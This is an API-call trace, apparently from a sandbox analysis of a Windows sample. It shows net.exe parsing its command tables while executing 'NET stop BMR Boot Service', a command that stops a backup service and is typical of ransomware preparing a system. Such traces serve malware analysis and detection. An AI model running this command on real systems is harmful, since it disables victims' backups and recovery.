_String=0x0, _Delimiter="$", _Context=0x1eb | out: _String=0x0, _Context=0x1eb) returned="\r\nREPLICATOR: REPL, REPLICATOR" [0055.558] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x1eb | out: _String=0x0, _Context=0x1eb) returned="\r\nSESSION: SESSIONS, SESS" [0055.558] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x1eb | out: _String=0x0, _Context=0x1eb) returned="\r\nSTATISTICS: STATS" [0055.558] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x1eb | out: _String=0x0, _Context=0x1eb) returned="\r\nUSER: USERS" [0055.558] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x1eb | out: _String=0x0, _Context=0x1eb) returned="\r\nWORKSTATION: REDIRECTOR, REDIR, RDR, WORK, WKSTA, PRDR, DEVRDR" [0055.558] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x1eb | out: _String=0x0, _Context=0x1eb) returned="\r\nSERVER: SVR, SRV" [0055.558] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x1eb | out: _String=0x0, _Context=0x1eb) returned="\r\n" [0055.558] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x1eb | out: _String=0x0, _Context=0x1eb) returned 0x0 [0055.558] wcstok (in: _String="CONTINUE: CONT", _Delimiter=":,$", _Context=0x1eb | out: _String="CONTINUE", _Context=0x1eb) returned="CONTINUE" [0055.558] wcsspn (_String="CONTINUE", _Control="\x09\n\x0b\x0c\r ") returned 0x0 [0055.558] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3290140 | out: _String=0x0, _Context=0x3290140) returned=" CONT" [0055.558] wcsspn (_String=" CONT", _Control="\x09\n\x0b\x0c\r ") returned 0x5 [0055.558] _wcsicmp (_String1="CONT", _String2="stop") returned -16 [0055.558] _wcsicmp (_String1="CONT", _String2="BMR") returned 1 [0055.558] _wcsicmp (_String1="CONT", _String2="Boot") returned 1 [0055.558] _wcsicmp (_String1="CONT", _String2="Service") returned -16 [0055.558] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x1eb | out: _String=0x0, _Context=0x1eb) returned 0x0 [0055.558] wcstok (in: _String="\r\nFILE: FILES", _Delimiter=":,$", _Context=0x1eb | out: _String="\r\nFILE", _Context=0x1eb) returned="\r\nFILE" [0055.558] wcsspn (_String="\r\nFILE", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0055.558] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3290166 | out: _String=0x0, _Context=0x3290166) returned=" FILES" [0055.558] wcsspn (_String=" FILES", _Control="\x09\n\x0b\x0c\r ") returned 0x5 [0055.558] _wcsicmp (_String1="FILES", _String2="stop") returned -13 [0055.558] _wcsicmp (_String1="FILES", _String2="BMR") returned 4 [0055.558] _wcsicmp (_String1="FILES", _String2="Boot") returned 4 [0055.558] _wcsicmp (_String1="FILES", _String2="Service") returned -13 [0055.558] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x1eb | out: _String=0x0, _Context=0x1eb) returned 0x0 [0055.558] wcstok (in: _String="\r\nGROUP: GROUPS", _Delimiter=":,$", _Context=0x1eb | out: _String="\r\nGROUP", _Context=0x1eb) returned="\r\nGROUP" [0055.558] wcsspn (_String="\r\nGROUP", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0055.558] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x329018a | out: _String=0x0, _Context=0x329018a) returned=" GROUPS" [0055.558] wcsspn (_String=" GROUPS", _Control="\x09\n\x0b\x0c\r ") returned 0x5 [0055.558] _wcsicmp (_String1="GROUPS", _String2="stop") returned -12 [0055.558] _wcsicmp (_String1="GROUPS", _String2="BMR") returned 5 [0055.558] _wcsicmp (_String1="GROUPS", _String2="Boot") returned 5 [0055.559] _wcsicmp (_String1="GROUPS", _String2="Service") returned -12 [0055.559] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x1eb | out: _String=0x0, _Context=0x1eb) returned 0x0 [0055.559] wcstok (in: _String="\r\nREPLICATOR: REPL, REPLICATOR", _Delimiter=":,$", _Context=0x1eb | out: _String="\r\nREPLICATOR", _Context=0x1eb) returned="\r\nREPLICATOR" [0055.559] wcsspn (_String="\r\nREPLICATOR", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0055.559] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x32901b2 | out: _String=0x0, _Context=0x32901b2) returned=" REPL" [0055.559] wcsspn (_String=" REPL", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0055.559] _wcsicmp (_String1="REPL", _String2="stop") returned -1 [0055.559] _wcsicmp (_String1="REPL", _String2="BMR") returned 16 [0055.559] _wcsicmp (_String1="REPL", _String2="Boot") returned 16 [0055.559] _wcsicmp (_String1="REPL", _String2="Service") returned -1 [0055.559] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x1eb | out: _String=0x0, _Context=0x1eb) returned=" REPLICATOR" [0055.559] wcsspn (_String=" REPLICATOR", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0055.559] _wcsicmp (_String1="REPLICATOR", _String2="stop") returned -1 [0055.559] _wcsicmp (_String1="REPLICATOR", _String2="BMR") returned 16 [0055.559] _wcsicmp (_String1="REPLICATOR", _String2="Boot") returned 16 [0055.559] _wcsicmp (_String1="REPLICATOR", _String2="Service") returned -1 [0055.559] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x1eb | out: _String=0x0, _Context=0x1eb) returned 0x0 [0055.559] wcstok (in: _String="\r\nSESSION: SESSIONS, SESS", _Delimiter=":,$", _Context=0x1eb | out: _String="\r\nSESSION", _Context=0x1eb) returned="\r\nSESSION" [0055.559] wcsspn (_String="\r\nSESSION", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0055.559] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x32901f0 | out: _String=0x0, _Context=0x32901f0) returned=" SESSIONS" [0055.559] wcsspn (_String=" SESSIONS", _Control="\x09\n\x0b\x0c\r ") returned 0x5 [0055.559] _wcsicmp (_String1="SESSIONS", _String2="stop") returned -15 [0055.559] _wcsicmp (_String1="SESSIONS", _String2="BMR") returned 17 [0055.559] _wcsicmp (_String1="SESSIONS", _String2="Boot") returned 17 [0055.559] _wcsicmp (_String1="SESSIONS", _String2="Service") returned 1 [0055.559] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x1eb | out: _String=0x0, _Context=0x1eb) returned=" SESS" [0055.559] wcsspn (_String=" SESS", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0055.559] _wcsicmp (_String1="SESS", _String2="stop") returned -15 [0055.559] _wcsicmp (_String1="SESS", _String2="BMR") returned 17 [0055.559] _wcsicmp (_String1="SESS", _String2="Boot") returned 17 [0055.559] _wcsicmp (_String1="SESS", _String2="Service") returned 1 [0055.559] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x1eb | out: _String=0x0, _Context=0x1eb) returned 0x0 [0055.559] wcstok (in: _String="\r\nSTATISTICS: STATS", _Delimiter=":,$", _Context=0x1eb | out: _String="\r\nSTATISTICS", _Context=0x1eb) returned="\r\nSTATISTICS" [0055.559] wcsspn (_String="\r\nSTATISTICS", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0055.559] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x329022c | out: _String=0x0, _Context=0x329022c) returned=" STATS" [0055.559] wcsspn (_String=" STATS", _Control="\x09\n\x0b\x0c\r ") returned 0x5 [0055.559] _wcsicmp (_String1="STATS", _String2="stop") returned -14 [0055.560] _wcsicmp (_String1="STATS", _String2="BMR") returned 17 [0055.560] _wcsicmp (_String1="STATS", _String2="Boot") returned 17 [0055.560] _wcsicmp (_String1="STATS", _String2="Service") returned 15 [0055.560] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x1eb | out: _String=0x0, _Context=0x1eb) returned 0x0 [0055.560] wcstok (in: _String="\r\nUSER: USERS", _Delimiter=":,$", _Context=0x1eb | out: _String="\r\nUSER", _Context=0x1eb) returned="\r\nUSER" [0055.560] wcsspn (_String="\r\nUSER", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0055.560] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x329025c | out: _String=0x0, _Context=0x329025c) returned=" USERS" [0055.560] wcsspn (_String=" USERS", _Control="\x09\n\x0b\x0c\r ") returned 0x5 [0055.560] _wcsicmp (_String1="USERS", _String2="stop") returned 2 [0055.560] _wcsicmp (_String1="USERS", _String2="BMR") returned 19 [0055.560] _wcsicmp (_String1="USERS", _String2="Boot") returned 19 [0055.560] _wcsicmp (_String1="USERS", _String2="Service") returned 2 [0055.560] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x1eb | out: _String=0x0, _Context=0x1eb) returned 0x0 [0055.560] wcstok (in: _String="\r\nWORKSTATION: REDIRECTOR, REDIR, RDR, WORK, WKSTA, PRDR, DEVRDR", _Delimiter=":,$", _Context=0x1eb | out: _String="\r\nWORKSTATION", _Context=0x1eb) returned="\r\nWORKSTATION" [0055.560] wcsspn (_String="\r\nWORKSTATION", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0055.560] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3290280 | out: _String=0x0, _Context=0x3290280) returned=" REDIRECTOR" [0055.560] wcsspn (_String=" REDIRECTOR", _Control="\x09\n\x0b\x0c\r ") returned 0x5 [0055.560] _wcsicmp (_String1="REDIRECTOR", _String2="stop") returned -1 [0055.560] _wcsicmp (_String1="REDIRECTOR", _String2="BMR") returned 16 [0055.560] _wcsicmp (_String1="REDIRECTOR", _String2="Boot") returned 16 [0055.560] _wcsicmp (_String1="REDIRECTOR", _String2="Service") returned -1 [0055.560] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x1eb | out: _String=0x0, _Context=0x1eb) returned=" REDIR" [0055.560] wcsspn (_String=" REDIR", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0055.560] _wcsicmp (_String1="REDIR", _String2="stop") returned -1 [0055.560] _wcsicmp (_String1="REDIR", _String2="BMR") returned 16 [0055.560] _wcsicmp (_String1="REDIR", _String2="Boot") returned 16 [0055.560] _wcsicmp (_String1="REDIR", _String2="Service") returned -1 [0055.560] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x1eb | out: _String=0x0, _Context=0x1eb) returned=" RDR" [0055.560] wcsspn (_String=" RDR", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0055.560] _wcsicmp (_String1="RDR", _String2="stop") returned -1 [0055.560] _wcsicmp (_String1="RDR", _String2="BMR") returned 16 [0055.560] _wcsicmp (_String1="RDR", _String2="Boot") returned 16 [0055.560] _wcsicmp (_String1="RDR", _String2="Service") returned -1 [0055.560] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x1eb | out: _String=0x0, _Context=0x1eb) returned=" WORK" [0055.560] wcsspn (_String=" WORK", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0055.560] _wcsicmp (_String1="WORK", _String2="stop") returned 4 [0055.561] _wcsicmp (_String1="WORK", _String2="BMR") returned 21 [0055.561] _wcsicmp (_String1="WORK", _String2="Boot") returned 21 [0055.561] _wcsicmp (_String1="WORK", _String2="Service") returned 4 [0055.561] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x1eb | out: _String=0x0, _Context=0x1eb) returned=" WKSTA" [0055.561] wcsspn (_String=" WKSTA", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0055.561] _wcsicmp (_String1="WKSTA", _String2="stop") returned 4 [0055.561] _wcsicmp (_String1="WKSTA", _String2="BMR") returned 21 [0055.561] _wcsicmp (_String1="WKSTA", _String2="Boot") returned 21 [0055.561] _wcsicmp (_String1="WKSTA", _String2="Service") returned 4 [0055.561] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x1eb | out: _String=0x0, _Context=0x1eb) returned=" PRDR" [0055.561] wcsspn (_String=" PRDR", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0055.561] _wcsicmp (_String1="PRDR", _String2="stop") returned -3 [0055.561] _wcsicmp (_String1="PRDR", _String2="BMR") returned 14 [0055.561] _wcsicmp (_String1="PRDR", _String2="Boot") returned 14 [0055.561] _wcsicmp (_String1="PRDR", _String2="Service") returned -3 [0055.561] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x1eb | out: _String=0x0, _Context=0x1eb) returned=" DEVRDR" [0055.561] wcsspn (_String=" DEVRDR", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0055.561] _wcsicmp (_String1="DEVRDR", _String2="stop") returned -15 [0055.561] _wcsicmp (_String1="DEVRDR", _String2="BMR") returned 2 [0055.561] _wcsicmp (_String1="DEVRDR", _String2="Boot") returned 2 [0055.561] _wcsicmp (_String1="DEVRDR", _String2="Service") returned -15 [0055.561] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x1eb | out: _String=0x0, _Context=0x1eb) returned 0x0 [0055.561] wcstok (in: _String="\r\nSERVER: SVR, SRV", _Delimiter=":,$", _Context=0x1eb | out: _String="\r\nSERVER", _Context=0x1eb) returned="\r\nSERVER" [0055.561] wcsspn (_String="\r\nSERVER", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0055.561] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x329030a | out: _String=0x0, _Context=0x329030a) returned=" SVR" [0055.561] wcsspn (_String=" SVR", _Control="\x09\n\x0b\x0c\r ") returned 0x5 [0055.561] _wcsicmp (_String1="SVR", _String2="stop") returned 2 [0055.561] _wcsicmp (_String1="SVR", _String2="BMR") returned 17 [0055.561] _wcsicmp (_String1="SVR", _String2="Boot") returned 17 [0055.561] _wcsicmp (_String1="SVR", _String2="Service") returned 17 [0055.561] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x1eb | out: _String=0x0, _Context=0x1eb) returned=" SRV" [0055.561] wcsspn (_String=" SRV", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0055.561] _wcsicmp (_String1="SRV", _String2="stop") returned -2 [0055.561] _wcsicmp (_String1="SRV", _String2="BMR") returned 17 [0055.561] _wcsicmp (_String1="SRV", _String2="Boot") returned 17 [0055.562] _wcsicmp (_String1="SRV", _String2="Service") returned 13 [0055.562] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x1eb | out: _String=0x0, _Context=0x1eb) returned 0x0 [0055.562] FormatMessageW (in: dwFlags=0x1900, lpSource=0x11d0002, dwMessageId=0xc5e, dwLanguageId=0x0, lpBuffer=0x107f0d0, nSize=0x0, Arguments=0x107f0cc | out: lpBuffer="䡀̨ć警ģ౞") returned 0x1c [0055.562] wcstok (in: _String="NAMES$\r\nSYNTAX$\r\nSERVICES$\r\n", _Delimiter="$", _Context=0x1eb | out: _String="NAMES", _Context=0x1eb) returned="NAMES" [0055.562] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x1eb | out: _String=0x0, _Context=0x1eb) returned="\r\nSYNTAX" [0055.562] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x1eb | out: _String=0x0, _Context=0x1eb) returned="\r\nSERVICES" [0055.562] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x1eb | out: _String=0x0, _Context=0x1eb) returned="\r\n" [0055.562] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x1eb | out: _String=0x0, _Context=0x1eb) returned 0x0 [0055.562] wcsspn (_String="NAMES", _Control="\x09\n\x0b\x0c\r ") returned 0x0 [0055.562] _wcsicmp (_String1="stop", _String2="NAMES") returned 5 [0055.562] wcsspn (_String="\r\nSYNTAX", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0055.562] _wcsicmp (_String1="stop", _String2="SYNTAX") returned -5 [0055.562] wcsspn (_String="\r\nSERVICES", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0055.562] _wcsicmp (_String1="stop", _String2="SERVICES") returned 15 [0055.562] wcscpy_s (in: _Destination=0x1247610, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0055.562] LoadLibraryExW (lpLibFileName="NETMSG", hFile=0x0, dwFlags=0x20) returned 0x3260002 [0055.563] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x3260002, dwMessageId=0x111d, dwLanguageId=0x0, lpBuffer=0x1247c20, nSize=0x800, Arguments=0x12473d0 | out: lpBuffer="The syntax of this command is:\r\n") returned 0x20 [0055.563] GetFileType (hFile=0x90) returned 0x2 [0055.563] GetConsoleMode (in: hConsoleHandle=0x90, lpMode=0x107f098 | out: lpMode=0x107f098) returned 1 [0055.564] WriteConsoleW (in: hConsoleOutput=0x90, lpBuffer=0x1247c20*, nNumberOfCharsToWrite=0x20, lpNumberOfCharsWritten=0x107f0a4, lpReserved=0x0 | out: lpBuffer=0x1247c20*, lpNumberOfCharsWritten=0x107f0a4*=0x20) returned 1 [0055.565] GetFileType (hFile=0x90) returned 0x2 [0055.565] GetConsoleMode (in: hConsoleHandle=0x90, lpMode=0x107f098 | out: lpMode=0x107f098) returned 1 [0055.565] WriteConsoleW (in: hConsoleOutput=0x90, lpBuffer=0x12212e4*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x107f0a4, lpReserved=0x0 | out: lpBuffer=0x12212e4*, lpNumberOfCharsWritten=0x107f0a4*=0x2) returned 1 [0055.565] wcscpy_s (in: _Destination=0x107f140, _SizeInWords=0x200, _Source="NET" | out: _Destination="NET") returned 0x0 [0055.565] wcsncat_s (in: _Destination="NET", _SizeInWords=0x200, _Source=" ", _MaxCount=0xffffffff | out: _Destination="NET ") returned 0x0 [0055.565] wcsncat_s (in: _Destination="NET ", _SizeInWords=0x200, _Source="stop", _MaxCount=0xffffffff | out: _Destination="NET stop") returned 0x0 [0055.565] wcsncat_s (in: _Destination="NET stop", _SizeInWords=0x200, _Source=" ", _MaxCount=0xffffffff | out: _Destination="NET stop ") returned 0x0 [0055.565] wcsncat_s (in: _Destination="NET stop ", _SizeInWords=0x200, _Source="BMR", _MaxCount=0xffffffff | out: _Destination="NET stop BMR") returned 0x0 [0055.565] wcsncat_s (in: _Destination="NET stop BMR", _SizeInWords=0x200, _Source=" ", _MaxCount=0xffffffff | out: _Destination="NET stop BMR ") returned 0x0 [0055.565] wcsncat_s (in: _Destination="NET stop BMR ", _SizeInWords=0x200, _Source="Boot", _MaxCount=0xffffffff | out: _Destination="NET stop BMR Boot") returned 0x0 [0055.565] wcsncat_s (in: _Destination="NET stop BMR Boot", _SizeInWords=0x200, _Source=" ", _MaxCount=0xffffffff | out: _Destination="NET stop BMR Boot ") returned 0x0 [0055.565] wcsncat_s (in: _Destination="NET stop BMR Boot ", _SizeInWords=0x200, _Source="Service", _MaxCount=0xffffffff | out: _Destination="NET stop BMR Boot Service") returned 0x0 [0055.565] FormatMessageW (in: dwFlags=0x1900, lpSource=0x11d0002, dwMessageId=0xbfc, dwLanguageId=0x0, lpBuffer=0x107f0b4, nSize=0x0, Arguments=0x107f0b0 | out: lpBuffer="͈̩ć蛬ģ௼") returned 0xad [0055.565] _wcsnicmp (_String1="NET stop BMR Boot Service", _String2="NET ACCOUNTS\r\n[/FORCELOGO", _MaxCount=0x19) returned 18 [0055.565] LocalFree (hMem=0x3290348) returned 0x0 [0055.565] FormatMessageW (in: dwFlags=0x1900, lpSource=0x11d0002, dwMessageId=0xbff, dwLanguageId=0x0, lpBuffer=0x107f0b4, nSize=0x0, Arguments=0x107f0b0 | out: lpBuffer="͈̩ć蛬ģ௿") returned 0x2e [0055.566] _wcsnicmp (_String1="NET stop BMR Boot Service", _String2="NET COMPUTER\r\n\\\\computern", _MaxCount=0x19) returned 16 [0055.566] LocalFree (hMem=0x3290348) returned 0x0 [0055.566] FormatMessageW (in: dwFlags=0x1900, lpSource=0x11d0002, dwMessageId=0xc02, dwLanguageId=0x0, lpBuffer=0x107f0b4, nSize=0x0, Arguments=0x107f0b0 | out: lpBuffer="͈̩ć蛬ģం") returned 0x7d [0055.566] _wcsnicmp (_String1="NET stop BMR Boot Service", _String2="NET CONFIG SERVER\r\n[/AUTO", _MaxCount=0x19) returned 16 [0055.566] LocalFree (hMem=0x3290348) returned 0x0 [0055.566] FormatMessageW (in: dwFlags=0x1900, lpSource=0x11d0002, dwMessageId=0xc05, dwLanguageId=0x0, lpBuffer=0x107f0b4, nSize=0x0, Arguments=0x107f0b0 | out: lpBuffer="͈̩ć蛬ģఅ") returned 0x26 [0055.566] _wcsnicmp (_String1="NET stop BMR Boot Service", _String2="NET CONFIG\r\n[SERVER | WOR", _MaxCount=0x19) returned 16 [0055.566] LocalFree (hMem=0x3290348) returned 0x0 [0055.566] FormatMessageW (in: dwFlags=0x1900, lpSource=0x11d0002, dwMessageId=0xc08, dwLanguageId=0x0, lpBuffer=0x107f0b4, nSize=0x0, Arguments=0x107f0b0 | out: lpBuffer="䉸̨ć蛬ģఈ") returned 0x19 [0055.566] _wcsnicmp (_String1="NET stop BMR Boot Service", _String2="NET CONTINUE\r\nservice\r\n\r\n", _MaxCount=0x19) returned 16 [0055.566] LocalFree (hMem=0x3284278) returned 0x0 [0055.566] FormatMessageW (in: dwFlags=0x1900, lpSource=0x11d0002, dwMessageId=0xc0b, dwLanguageId=0x0, lpBuffer=0x107f0b4, nSize=0x0, Arguments=0x107f0b0 | out: lpBuffer="͈̩ć蛬ģఋ") returned 0x1b [0055.566] _wcsnicmp (_String1="NET stop BMR Boot Service", _String2="NET FILE\r\n[id [/CLOSE]]\r\n", _MaxCount=0x19) returned 13 [0055.566] LocalFree (hMem=0x3290348) returned 0x0 [0055.566] FormatMessageW (in: dwFlags=0x1900, lpSource=0x11d0002, dwMessageId=0xc0e, dwLanguageId=0x0, lpBuffer=0x107f0b4, nSize=0x0, Arguments=0x107f0b0 | out: lpBuffer="͈̩ć蛬ģఎ") returned 0xbe [0055.566] _wcsnicmp (_String1="NET stop BMR Boot Service", _String2="NET GROUP\r\n[groupname [/C", _MaxCount=0x19) returned 12 [0055.566] LocalFree (hMem=0x3290348) returned 0x0 [0055.566] FormatMessageW (in: dwFlags=0x1900, lpSource=0x11d0002, dwMessageId=0xc11, dwLanguageId=0x0, lpBuffer=0x107f0b4, nSize=0x0, Arguments=0x107f0b0 | out: lpBuffer="͈̩ć蛬ģ఑") returned 0x33 [0055.566] _wcsnicmp (_String1="NET stop BMR Boot Service", _String2="NET HELP\r\ncommand\r\n -", _MaxCount=0x19) returned 11 [0055.566] LocalFree (hMem=0x3290348) returned 0x0 [0055.566] FormatMessageW (in: dwFlags=0x1900, lpSource=0x11d0002, dwMessageId=0xc14, dwLanguageId=0x0, lpBuffer=0x107f0b4, nSize=0x0, Arguments=0x107f0b0 | out: lpBuffer="䉸̨ć蛬ģఔ") returned 0x19 [0055.566] _wcsnicmp (_String1="NET stop BMR Boot Service", _String2="NET HELPMSG\r\nmessage#\r\n\r\n", _MaxCount=0x19) returned 11 [0055.566] LocalFree (hMem=0x3284278) returned 0x0 [0055.566] FormatMessageW (in: dwFlags=0x1900, lpSource=0x11d0002, dwMessageId=0xc17, dwLanguageId=0x0, lpBuffer=0x107f0b4, nSize=0x0, Arguments=0x107f0b0 | out: lpBuffer="͈̩ć蛬ģగ") returned 0xc1 [0055.566] _wcsnicmp (_String1="NET stop BMR Boot Service", _String2="NET LOCALGROUP\r\n[groupnam", _MaxCount=0x19) returned 7 [0055.566] LocalFree (hMem=0x3290348) returned 0x0 [0055.566] FormatMessageW (in: dwFlags=0x1900, lpSource=0x11d0002, dwMessageId=0xc1a, dwLanguageId=0x0, lpBuffer=0x107f0b4, nSize=0x0, Arguments=0x107f0b0 | out: lpBuffer="诠̨ć蛬ģచ") returned 0x16 [0055.566] _wcsnicmp (_String1="NET stop BMR Boot Service", _String2="NET PAUSE\r\nservice\r\n\r\n", _MaxCount=0x19) returned 3 [0055.566] LocalFree (hMem=0x3288be0) returned 0x0 [0055.566] FormatMessageW (in: dwFlags=0x1900, lpSource=0x11d0002, dwMessageId=0xc1d, dwLanguageId=0x0, lpBuffer=0x107f0b4, nSize=0x0, Arguments=0x107f0b0 | out: lpBuffer="͈̩ć蛬ģఝ") returned 0x33 [0055.566] _wcsnicmp (_String1="NET stop BMR Boot Service", _String2="NET SESSION\r\n[\\\\computern", _MaxCount=0x19) returned 15 [0055.566] LocalFree (hMem=0x3290348) returned 0x0 [0055.566] FormatMessageW (in: dwFlags=0x1900, lpSource=0x11d0002, dwMessageId=0xc20, dwLanguageId=0x0, lpBuffer=0x107f0b4, nSize=0x0, Arguments=0x107f0b0 | out: lpBuffer="͈̩ć蛬ģఠ") returned 0x234 [0055.567] _wcsnicmp (_String1="NET stop BMR Boot Service", _String2="NET SHARE\r\nsharename\r\n ", _MaxCount=0x19) returned 12 [0055.567] LocalFree (hMem=0x3290348) returned 0x0 [0055.567] FormatMessageW (in: dwFlags=0x1900, lpSource=0x11d0002, dwMessageId=0xc23, dwLanguageId=0x0, lpBuffer=0x107f0b4, nSize=0x0, Arguments=0x107f0b0 | out: lpBuffer="䙨̨ć蛬ģణ") returned 0x13 [0055.567] _wcsnicmp (_String1="NET stop BMR Boot Service", _String2="NET START BROWSER\r\n", _MaxCount=0x19) returned 14 [0055.567] LocalFree (hMem=0x3284668) returned 0x0 [0055.567] FormatMessageW (in: dwFlags=0x1900, lpSource=0x11d0002, dwMessageId=0xc26, dwLanguageId=0x0, lpBuffer=0x107f0b4, nSize=0x0, Arguments=0x107f0b0 | out: lpBuffer="䉸̨ć蛬ģద") returned 0x14 [0055.567] _wcsnicmp (_String1="NET stop BMR Boot Service", _String2="NET START EVENTLOG\r\n", _MaxCount=0x19) returned 14 [0055.567] LocalFree (hMem=0x3284278) returned 0x0 [0055.567] FormatMessageW (in: dwFlags=0x1900, lpSource=0x11d0002, dwMessageId=0xc29, dwLanguageId=0x0, lpBuffer=0x107f0b4, nSize=0x0, Arguments=0x107f0b0 | out: lpBuffer="䉸̨ć蛬ģ఩") returned 0x14 [0055.567] _wcsnicmp (_String1="NET stop BMR Boot Service", _String2="NET START NETLOGON\r\n", _MaxCount=0x19) returned 14 [0055.567] LocalFree (hMem=0x3284278) returned 0x0 [0055.567] FormatMessageW (in: dwFlags=0x1900, lpSource=0x11d0002, dwMessageId=0xc2c, dwLanguageId=0x0, lpBuffer=0x107f0b4, nSize=0x0, Arguments=0x107f0b0 | out: lpBuffer="㞠̨ć蛬ģబ") returned 0x11 [0055.567] _wcsnicmp (_String1="NET stop BMR Boot Service", _String2="NET START RPCSS\r\n", _MaxCount=0x19) returned 14 [0055.567] LocalFree (hMem=0x32837a0) returned 0x0 [0055.567] FormatMessageW (in: dwFlags=0x1900, lpSource=0x11d0002, dwMessageId=0xc2f, dwLanguageId=0x0, lpBuffer=0x107f0b4, nSize=0x0, Arguments=0x107f0b0 | out: lpBuffer="䉸̨ć蛬ģయ") returned 0x14 [0055.567] _wcsnicmp (_String1="NET stop BMR Boot Service", _String2="NET START SCHEDULE\r\n", _MaxCount=0x19) returned 14 [0055.567] LocalFree (hMem=0x3284278) returned 0x0 [0055.567] FormatMessageW (in: dwFlags=0x1900, lpSource=0x11d0002, dwMessageId=0xc32, dwLanguageId=0x0, lpBuffer=0x107f0b4, nSize=0x0, Arguments=0x107f0b0 | out: lpBuffer="䙨̨ć蛬ģల") returned 0x12 [0055.567] _wcsnicmp (_String1="NET stop BMR Boot Service", _String2="NET START SERVER\r\n", _MaxCount=0x19) returned 14 [0055.567] LocalFree (hMem=0x3284668) returned 0x0 [0055.567] FormatMessageW (in: dwFlags=0x1900, lpSource=0x11d0002, dwMessageId=0xc35, dwLanguageId=0x0, lpBuffer=0x107f0b4, nSize=0x0, Arguments=0x107f0b0 | out: lpBuffer="㞠̨ć蛬ģవ") returned 0xf [0055.567] _wcsnicmp (_String1="NET stop BMR Boot Service", _String2="NET START UPS\r\n", _MaxCount=0x19) returned 14 [0055.567] LocalFree (hMem=0x32837a0) returned 0x0 [0055.567] FormatMessageW (in: dwFlags=0x1900, lpSource=0x11d0002, dwMessageId=0xc38, dwLanguageId=0x0, lpBuffer=0x107f0b4, nSize=0x0, Arguments=0x107f0b0 | out: lpBuffer="诠̨ć蛬ģస") returned 0x17 [0055.567] _wcsnicmp (_String1="NET stop BMR Boot Service", _String2="NET START WORKSTATION\r\n", _MaxCount=0x19) returned 14 [0055.567] LocalFree (hMem=0x3288be0) returned 0x0 [0055.567] FormatMessageW (in: dwFlags=0x1900, lpSource=0x11d0002, dwMessageId=0xc3b, dwLanguageId=0x0, lpBuffer=0x107f0b4, nSize=0x0, Arguments=0x107f0b0 | out: lpBuffer="诠̨ć蛬ģ఻") returned 0x18 [0055.567] _wcsnicmp (_String1="NET stop BMR Boot Service", _String2="NET START\r\n[service]\r\n\r\n", _MaxCount=0x19) returned 14 [0055.567] LocalFree (hMem=0x3288be0) returned 0x0 [0055.567] FormatMessageW (in: dwFlags=0x1900, lpSource=0x11d0002, dwMessageId=0xc3e, dwLanguageId=0x0, lpBuffer=0x107f0b4, nSize=0x0, Arguments=0x107f0b0 | out: lpBuffer="͈̩ć蛬ģా") returned 0x21 [0055.568] _wcsnicmp (_String1="NET stop BMR Boot Service", _String2="NET STATISTICS\r\n[WORKSTAT", _MaxCount=0x19) returned 14 [0055.568] LocalFree (hMem=0x3290348) returned 0x0 [0055.568] FormatMessageW (in: dwFlags=0x1900, lpSource=0x11d0002, dwMessageId=0xc41, dwLanguageId=0x0, lpBuffer=0x107f0b4, nSize=0x0, Arguments=0x107f0b0 | out: lpBuffer="诠̨ć蛬ģు") returned 0x15 [0055.568] _wcsnicmp (_String1="NET stop BMR Boot Service", _String2="NET STOP\r\nservice\r\n\r\n", _MaxCount=0x19) returned 19 [0055.568] LocalFree (hMem=0x3288be0) 